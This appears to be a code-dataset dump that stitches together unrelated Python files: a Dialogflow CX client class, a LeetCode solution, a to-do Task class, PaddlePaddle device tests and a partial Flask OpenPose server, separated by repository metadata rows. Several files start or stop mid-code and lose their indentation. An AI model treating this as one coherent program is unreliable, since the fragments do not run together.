return "projects/{project}/locations/{location}/agents/{agent}/flows/{flow}/transitionRouteGroups/{transition_route_group}".format(
project=project,
location=location,
agent=agent,
flow=flow,
transition_route_group=transition_route_group,
)
@staticmethod
def parse_transition_route_group_path(path: str) -> Dict[str, str]:
"""Parse a transition_route_group path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/flows/(?P<flow>.+?)/transitionRouteGroups/(?P<transition_route_group>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def webhook_path(project: str, location: str, agent: str, webhook: str,) -> str:
"""Return a fully-qualified webhook string."""
return "projects/{project}/locations/{location}/agents/{agent}/webhooks/{webhook}".format(
project=project, location=location, agent=agent, webhook=webhook,
)
@staticmethod
def parse_webhook_path(path: str) -> Dict[str, str]:
"""Parse a webhook path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/agents/(?P<agent>.+?)/webhooks/(?P<webhook>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str,) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str,) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder,)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str,) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization,)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str,) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project,)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str,) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project, location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
    def __init__(
        self,
        *,
        credentials: Optional[credentials.Credentials] = None,
        transport: Union[str, TransitionRouteGroupsTransport, None] = None,
        client_options: Optional[client_options_lib.ClientOptions] = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
    ) -> None:
        """Instantiate the transition route groups client.

        Args:
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            transport (Union[str, TransitionRouteGroupsTransport]): The
                transport to use. If set to None, a transport is chosen
                automatically.
            client_options (google.api_core.client_options.ClientOptions): Custom options for the
                client. It won't take effect if a ``transport`` instance is provided.
                (1) The ``api_endpoint`` property can be used to override the
                default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
                environment variable can also be used to override the endpoint:
                "always" (always use the default mTLS endpoint), "never" (always
                use the default regular endpoint) and "auto" (auto switch to the
                default mTLS endpoint if client certificate is present, this is
                the default value). However, the ``api_endpoint`` property takes
                precedence if provided.
                (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
                is "true", then the ``client_cert_source`` property can be used
                to provide client certificate for mutual TLS transport. If
                not provided, the default SSL client certificate will be used if
                present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
                set, no client certificate will be used.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.

        Raises:
            google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
                creation failed for any reason.
        """
        # Normalize client_options: accept a dict or None.
        if isinstance(client_options, dict):
            client_options = client_options_lib.from_dict(client_options)
        if client_options is None:
            client_options = client_options_lib.ClientOptions()

        # Create SSL credentials for mutual TLS if needed.
        use_client_cert = bool(
            util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))
        )

        client_cert_source_func = None
        is_mtls = False
        if use_client_cert:
            # Prefer an explicitly supplied cert source; otherwise fall back
            # to the machine's default client certificate, if any.
            if client_options.client_cert_source:
                is_mtls = True
                client_cert_source_func = client_options.client_cert_source
            else:
                is_mtls = mtls.has_default_client_cert_source()
                client_cert_source_func = (
                    mtls.default_client_cert_source() if is_mtls else None
                )

        # Figure out which api endpoint to use.
        if client_options.api_endpoint is not None:
            api_endpoint = client_options.api_endpoint
        else:
            use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
            if use_mtls_env == "never":
                api_endpoint = self.DEFAULT_ENDPOINT
            elif use_mtls_env == "always":
                api_endpoint = self.DEFAULT_MTLS_ENDPOINT
            elif use_mtls_env == "auto":
                api_endpoint = (
                    self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
                )
            else:
                raise MutualTLSChannelError(
                    "Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
                )

        # Save or instantiate the transport.
        # Ordinarily, we provide the transport, but allowing a custom transport
        # instance provides an extensibility point for unusual situations.
        if isinstance(transport, TransitionRouteGroupsTransport):
            # transport is a TransitionRouteGroupsTransport instance.
            # A ready-made transport already carries credentials and scopes,
            # so supplying them here too is an error.
            if credentials or client_options.credentials_file:
                raise ValueError(
                    "When providing a transport instance, "
                    "provide its credentials directly."
                )
            if client_options.scopes:
                raise ValueError(
                    "When providing a transport instance, "
                    "provide its scopes directly."
                )
            self._transport = transport
        else:
            Transport = type(self).get_transport_class(transport)
            self._transport = Transport(
                credentials=credentials,
                credentials_file=client_options.credentials_file,
                host=api_endpoint,
                scopes=client_options.scopes,
                client_cert_source_for_mtls=client_cert_source_func,
                quota_project_id=client_options.quota_project_id,
                client_info=client_info,
            )
    def list_transition_route_groups(
        self,
        request: transition_route_group.ListTransitionRouteGroupsRequest = None,
        *,
        parent: str = None,
        retry: retries.Retry = gapic_v1.method.DEFAULT,
        timeout: float = None,
        metadata: Sequence[Tuple[str, str]] = (),
    ) -> pagers.ListTransitionRouteGroupsPager:
        r"""Returns the list of all transition route groups in
        the specified flow.

        Args:
            request (google.cloud.dialogflowcx_v3beta1.types.ListTransitionRouteGroupsRequest):
                The request object. The request message for
                [TransitionRouteGroups.ListTransitionRouteGroups][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.ListTransitionRouteGroups].
            parent (str):
                Required. The flow to list all transition route groups
                for. Format:
                ``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>``.

                This corresponds to the ``parent`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.

            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.

        Returns:
            google.cloud.dialogflowcx_v3beta1.services.transition_route_groups.pagers.ListTransitionRouteGroupsPager:
                The response message for
                [TransitionRouteGroups.ListTransitionRouteGroups][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.ListTransitionRouteGroups].

                Iterating over this object will yield results and
                resolve additional pages automatically.

        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        has_flattened_params = any([parent])
        if request is not None and has_flattened_params:
            raise ValueError(
                "If the `request` argument is set, then none of "
                "the individual field arguments should be set."
            )

        # Minor optimization to avoid making a copy if the user passes
        # in a transition_route_group.ListTransitionRouteGroupsRequest.
        # There's no risk of modifying the input as we've already verified
        # there are no flattened fields.
        if not isinstance(
            request, transition_route_group.ListTransitionRouteGroupsRequest
        ):
            request = transition_route_group.ListTransitionRouteGroupsRequest(request)

            # If we have keyword arguments corresponding to fields on the
            # request, apply these.
            if parent is not None:
                request.parent = parent

        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = self._transport._wrapped_methods[
            self._transport.list_transition_route_groups
        ]

        # Certain fields should be provided within the metadata header;
        # add these here.  Routing by ``parent`` lets the backend dispatch
        # the request to the correct regional service.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
        )

        # Send the request.
        response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)

        # This method is paged; wrap the response in a pager, which provides
        # an `__iter__` convenience method.
        response = pagers.ListTransitionRouteGroupsPager(
            method=rpc, request=request, response=response, metadata=metadata,
        )

        # Done; return the response.
        return response
def get_transition_route_group(
self,
request: transition_route_group.GetTransitionRouteGroupRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> transition_route_group.TransitionRouteGroup:
r"""Retrieves the specified
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
Args:
request (google.cloud.dialogflowcx_v3beta1.types.GetTransitionRouteGroupRequest):
The request object. The request message for
[TransitionRouteGroups.GetTransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.GetTransitionRouteGroup].
name (str):
Required. The name of the
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>/transitionRouteGroups/<Transition Route Group ID>``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup:
An TransitionRouteGroup represents a group of
[TransitionRoutes][google.cloud.dialogflow.cx.v3beta1.TransitionRoute]
to be used by a
[Page][google.cloud.dialogflow.cx.v3beta1.Page].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a transition_route_group.GetTransitionRouteGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, transition_route_group.GetTransitionRouteGroupRequest
):
request = transition_route_group.GetTransitionRouteGroupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.get_transition_route_group
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def create_transition_route_group(
self,
request: gcdc_transition_route_group.CreateTransitionRouteGroupRequest = None,
*,
parent: str = None,
transition_route_group: gcdc_transition_route_group.TransitionRouteGroup = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> gcdc_transition_route_group.TransitionRouteGroup:
r"""Creates an
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup]
in the specified flow.
Args:
request (google.cloud.dialogflowcx_v3beta1.types.CreateTransitionRouteGroupRequest):
The request object. The request message for
[TransitionRouteGroups.CreateTransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.CreateTransitionRouteGroup].
parent (str):
Required. The flow to create an
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup]
for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
transition_route_group (google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup):
Required. The transition route group
to create.
This corresponds to the ``transition_route_group`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup:
An TransitionRouteGroup represents a group of
[TransitionRoutes][google.cloud.dialogflow.cx.v3beta1.TransitionRoute]
to be used by a
[Page][google.cloud.dialogflow.cx.v3beta1.Page].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, transition_route_group])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a gcdc_transition_route_group.CreateTransitionRouteGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, gcdc_transition_route_group.CreateTransitionRouteGroupRequest
):
request = gcdc_transition_route_group.CreateTransitionRouteGroupRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if transition_route_group is not None:
request.transition_route_group = transition_route_group
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.create_transition_route_group
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def update_transition_route_group(
self,
request: gcdc_transition_route_group.UpdateTransitionRouteGroupRequest = None,
*,
transition_route_group: gcdc_transition_route_group.TransitionRouteGroup = None,
update_mask: field_mask.FieldMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> gcdc_transition_route_group.TransitionRouteGroup:
r"""Updates the specified
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
Args:
request (google.cloud.dialogflowcx_v3beta1.types.UpdateTransitionRouteGroupRequest):
The request object. The request message for
[TransitionRouteGroups.UpdateTransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.UpdateTransitionRouteGroup].
transition_route_group (google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup):
Required. The transition route group
to update.
This corresponds to the ``transition_route_group`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
The mask to control which fields get
updated.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.TransitionRouteGroup:
An TransitionRouteGroup represents a group of
[TransitionRoutes][google.cloud.dialogflow.cx.v3beta1.TransitionRoute]
to be used by a
[Page][google.cloud.dialogflow.cx.v3beta1.Page].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([transition_route_group, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a gcdc_transition_route_group.UpdateTransitionRouteGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, gcdc_transition_route_group.UpdateTransitionRouteGroupRequest
):
request = gcdc_transition_route_group.UpdateTransitionRouteGroupRequest(
request
)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if transition_route_group is not None:
request.transition_route_group = transition_route_group
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.update_transition_route_group
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("transition_route_group.name", request.transition_route_group.name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def delete_transition_route_group(
self,
request: transition_route_group.DeleteTransitionRouteGroupRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes the specified
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup].
Args:
request (google.cloud.dialogflowcx_v3beta1.types.DeleteTransitionRouteGroupRequest):
The request object. The request message for
[TransitionRouteGroups.DeleteTransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroups.DeleteTransitionRouteGroup].
name (str):
Required. The name of the
[TransitionRouteGroup][google.cloud.dialogflow.cx.v3beta1.TransitionRouteGroup]
to delete. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/flows/<Flow ID>/transitionRouteGroups/<Transition Route Group ID>``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a transition_route_group.DeleteTransitionRouteGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(
request, transition_route_group.DeleteTransitionRouteGroupRequest
):
request = transition_route_group.DeleteTransitionRouteGroupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[
self._transport.delete_transition_route_group
]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
try:
    # Advertise the installed library version in client-info metadata;
    # fall back to a bare ClientInfo when the distribution is not installed
    # (e.g. running straight from a source checkout).
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
        gapic_version=pkg_resources.get_distribution(
            "google-cloud-dialogflowcx",
        ).version,
    )
except pkg_resources.DistributionNotFound:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("TransitionRouteGroupsClient",)
| [
"[email protected]"
] | |
48fdd9fa5aba23d7bfbf4bd119d4bcc4a83a85a2 | 35d62f3ccf1c422b13b313c4e519a5ce335e934d | /leetcode/jewelsAndStones.py | cc1e31157da05da0b2095b9c498ceeb4b90ee203 | [] | no_license | malaybiswal/python | 357a074889299effe6a5fa2f1cd9c50ca35652d0 | 684d24d719b785725e736671faf2681232ecc394 | refs/heads/master | 2020-05-17T22:25:43.043929 | 2019-05-08T23:41:19 | 2019-05-08T23:41:19 | 183,999,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 223 | py | #https://leetcode.com/problems/jewels-and-stones/
def numJewelsInStones(J, S):
    """Count how many stones in ``S`` are jewels.

    ``J`` lists the jewel characters (case-sensitive; the LeetCode problem
    guarantees they are distinct) and ``S`` lists the stones held.

    Replaces the original O(len(J) * len(S)) nested loop with a set-based
    membership test, which is O(len(J) + len(S)).
    """
    jewels = set(J)
    return sum(1 for stone in S if stone in jewels)
# Ad-hoc smoke test: 'z' and 'Z' differ in case, so no stone matches
# and the script prints 0.
jewels_arg = "zz"
stones_arg = "ZZZ"
print(numJewelsInStones(jewels_arg, stones_arg))
"[email protected]"
] | |
516e7adfdc21f38790c5bfe5706d14864c96eaab | 3cd8bdcda9d0e549df184a5d9085ed8f5a86145d | /defining_classes/to_do_list/project/task.py | ad5910ea22a5b8855a43873b237cf5c1d554e494 | [] | no_license | ivklisurova/SoftUni_Python_OOP | bbec8a5d0d8c2c3f536dd2a92e9187aa39121692 | 59e2080b4eb0826a62a020ea3368a0bac6f644be | refs/heads/master | 2022-11-29T00:09:40.488544 | 2020-08-05T19:55:27 | 2020-08-05T19:55:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | class Task:
def __init__(self, name, due_date):
self.name = name
self.due_date = due_date
self.comments = []
self.completed = False
def change_name(self, new_name: str):
if new_name == self.name:
return 'Name cannot be the same.'
self.name = new_name
return self.name
def change_due_date(self, new_date: str):
if new_date == self.due_date:
return 'Date cannot be the same.'
self.due_date = new_date
return self.due_date
def add_comment(self, comment: str):
self.comments.append(comment)
def edit_comment(self, comment_number: int, new_comment: str):
if comment_number >= len(self.comments):
return 'Cannot find comment.'
self.comments[comment_number] = new_comment
return f'{", ".join(self.comments)}'
def details(self):
return f'Name: {self.name} - Due Date: {self.due_date}'
| [
"[email protected]"
] | |
e7b3c28e67c42c208b0778ca9b4afdfddfd18a79 | 706518f154812af56f8fc91a71cd65d9667d9ed0 | /python/paddle/fluid/tests/unittests/test_device.py | 08697a080445e606f17bdde83384eef391713721 | [
"Apache-2.0"
] | permissive | andreazanetti/Paddle | 3ea464703d67963134ffc6828f364412adb03fce | a259076dd01801e2e619237da02235a4856a96bb | refs/heads/develop | 2023-04-25T08:30:43.751734 | 2021-05-05T01:31:44 | 2021-05-05T01:31:44 | 263,870,069 | 0 | 2 | Apache-2.0 | 2020-07-07T10:45:08 | 2020-05-14T09:22:07 | null | UTF-8 | Python | false | false | 3,379 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import paddle
import paddle.fluid as fluid
import paddle.fluid.core as core
import paddle.fluid.framework as framework
class TestStaticDeviceManage(unittest.TestCase):
    """Static-graph tests for paddle.set_device / paddle.get_device.

    The shared helper sets the global device, builds and runs a tiny
    static program, then checks that both the executor's place and the
    reported device string match the requested device.
    """

    def _test_device(self, device_name, device_class):
        # Select the global device before any ops are created so the
        # program below is constructed for that device.
        paddle.set_device(device_name)
        out1 = paddle.zeros(shape=[1, 3], dtype='float32')
        out2 = paddle.ones(shape=[1, 3], dtype='float32')
        out3 = paddle.concat(x=[out1, out2], axis=0)
        exe = paddle.static.Executor()
        exe.run(paddle.fluid.default_startup_program())
        res = exe.run(fetch_list=[out3])
        device = paddle.get_device()
        # The executor must live on the expected place type, and the device
        # string must round-trip unchanged through set/get.
        self.assertEqual(isinstance(exe.place, device_class), True)
        self.assertEqual(device, device_name)

    def test_cpu_device(self):
        self._test_device("cpu", core.CPUPlace)

    def test_gpu_device(self):
        # Only meaningful on CUDA builds; silently skipped otherwise.
        if core.is_compiled_with_cuda():
            self._test_device("gpu:0", core.CUDAPlace)

    def test_xpu_device(self):
        # Only meaningful on XPU builds; silently skipped otherwise.
        if core.is_compiled_with_xpu():
            self._test_device("xpu:0", core.XPUPlace)
class TestImperativeDeviceManage(unittest.TestCase):
    """Dygraph (imperative-mode) tests for paddle.set_device / get_device.

    Each test runs inside fluid.dygraph.guard() and checks that the
    framework's current expected place matches the requested device.
    """

    def test_cpu(self):
        with fluid.dygraph.guard():
            paddle.set_device('cpu')
            out1 = paddle.zeros(shape=[1, 3], dtype='float32')
            out2 = paddle.ones(shape=[1, 3], dtype='float32')
            out3 = paddle.concat(x=[out1, out2], axis=0)
            device = paddle.get_device()
            self.assertEqual(
                isinstance(framework._current_expected_place(), core.CPUPlace),
                True)
            self.assertEqual(device, "cpu")

    def test_gpu(self):
        # Only meaningful on CUDA builds; silently skipped otherwise.
        if core.is_compiled_with_cuda():
            with fluid.dygraph.guard():
                paddle.set_device('gpu:0')
                out1 = paddle.zeros(shape=[1, 3], dtype='float32')
                out2 = paddle.ones(shape=[1, 3], dtype='float32')
                out3 = paddle.concat(x=[out1, out2], axis=0)
                device = paddle.get_device()
                self.assertEqual(
                    isinstance(framework._current_expected_place(),
                               core.CUDAPlace), True)
                self.assertEqual(device, "gpu:0")

    def test_xpu(self):
        # Only meaningful on XPU builds; silently skipped otherwise. Unlike
        # the other tests, this relies on the default device being XPU when
        # compiled for XPU (no explicit set_device call).
        if core.is_compiled_with_xpu():
            with fluid.dygraph.guard():
                out = paddle.to_tensor([1, 2])
                device = paddle.get_device()
                self.assertEqual(
                    isinstance(framework._current_expected_place(),
                               core.XPUPlace), True)
                self.assertTrue(out.place.is_xpu_place())
                self.assertEqual(device, "xpu:0")
# Allow running this test module directly as a script.
if __name__ == '__main__':
    unittest.main()
| [
"[email protected]"
] | |
67056ff3f3511beb22ed46e346b3d52b30d40eed | cc1cd104b4b383e7807e75e2fb0a8e84e5fcf7df | /api_server/openpose_wrapper/openpose_server/app.py | 491381120447d9b6e7f8461f4eb89313c620e8c9 | [] | no_license | Sam1224/OutfitApp-AWS | b9884d40945d2076f2135c0d2d75cf938161af9f | 6c1b4d1e5c328c5d22b8f055d41a57ec2e9b921e | refs/heads/master | 2022-04-24T11:50:24.506423 | 2020-04-29T11:03:43 | 2020-04-29T11:03:43 | 257,340,558 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,164 | py | # coding=utf-8
import os
import sys
import argparse
import json
from PIL import Image
import cv2
import numpy as np
import itertools
# flask
import flask
#from flask import Flask, render_template, request, jsonify
# openpose python API
sys.path.append('../openpose_gpu/build/python');
from openpose import pyopenpose as op
# 自作モジュール
from utils import conv_base64_to_pillow, conv_base64_to_cv, conv_pillow_to_base64
#======================
# Global variables
#======================
app = flask.Flask(__name__)
app.config['JSON_AS_ASCII'] = False  # keep non-ASCII (Japanese) characters unescaped in JSON responses
app.config["JSON_SORT_KEYS"] = False  # preserve key insertion order in JSON responses
# Directory holding the OpenPose model files, relative to this script.
OPENPOSE_MODE_DIR_PATH = "../openpose_gpu/models/"
#================================================================
# Handler for requests sent to "http://host_ip:5010"
#================================================================
@app.route('/')
def index():
    """Health-check endpoint: logs the request and confirms the server is up.

    Bug fix: the original handler ended with a bare ``return`` (returning
    None), and a Flask view that returns None raises an error / HTTP 500 on
    every request. It now returns a minimal valid (empty) 200 response.
    """
    print( "リクエスト受け取り" )
    return "", 200
#================================================================
# Handler for POST requests sent to "http://host_ip:5010/openpose"
#================================================================
@app.route('/openpose', methods=['POST'])
def responce():
    """Run OpenPose (body + face + hands) on the posted image and return the
    detected 2D/3D keypoints as an OpenPose-style JSON response.

    Expects a JSON body containing a "pose_img_base64" field with the input
    image encoded as base64.
    NOTE(review): "responce" is a misspelling of "response", but renaming
    the view would change the registered endpoint name.
    """
    print( "リクエスト受け取り" )
    if( app.debug ):
        print( "flask.request.method : ", flask.request.method )
        print( "flask.request.headers \n: ", flask.request.headers )
    #------------------------------------------
    # Extract the JSON payload from the request
    #------------------------------------------
    # python-requests clients deliver the JSON as a string, so it needs an
    # explicit json.loads(); other clients can use get_json() directly.
    # NOTE(review): `in` here is a substring test on the User-Agent prefix.
    if( flask.request.headers["User-Agent"].split("/")[0] in "python-requests" ):
        json_data = json.loads(flask.request.json)
    else:
        json_data = flask.request.get_json()
    #------------------------------------------
    # Decode the posted base64 image into an OpenCV image
    #------------------------------------------
    pose_img_cv = conv_base64_to_cv( json_data["pose_img_base64"] )
    if( app.debug ):
        cv2.imwrite( "tmp/pose_img.png", pose_img_cv )
    #------------------------------------------
    # Run the OpenPose Python API
    # Reference : openpose_gpu/build/examples/tutorial_api_python/01_body_from_image.py
    #------------------------------------------
    # Parameter setup
    params = dict()
    params["model_folder"] = OPENPOSE_MODE_DIR_PATH
    params["face"] = True
    params["hand"] = True
    # OpenPose Python-API
    opWrapper = op.WrapperPython()
    opWrapper.configure(params)
    opWrapper.start()
    # Process Image
    datum = op.Datum()
    datum.cvInputData = pose_img_cv
    opWrapper.emplaceAndPop([datum])
    # Extract keypoints.
    # Columns [8, 19..24] are removed from the body keypoints before
    # flattening — presumably dropping mid-hip/foot points of the BODY_25
    # model; TODO confirm against the model configuration.
    pose_keypoints_2d = np.delete( datum.poseKeypoints, [8, 19, 20, 21, 22, 23, 24], axis=1).reshape(-1).tolist()
    face_keypoints_2d = datum.faceKeypoints.reshape(-1).tolist()
    pose_keypoints_3d = datum.poseKeypoints3D.tolist()
    face_keypoints_3d = datum.faceKeypoints3D.tolist()
    left_hand_keypoints_2d = datum.handKeypoints[0].reshape(-1).tolist()
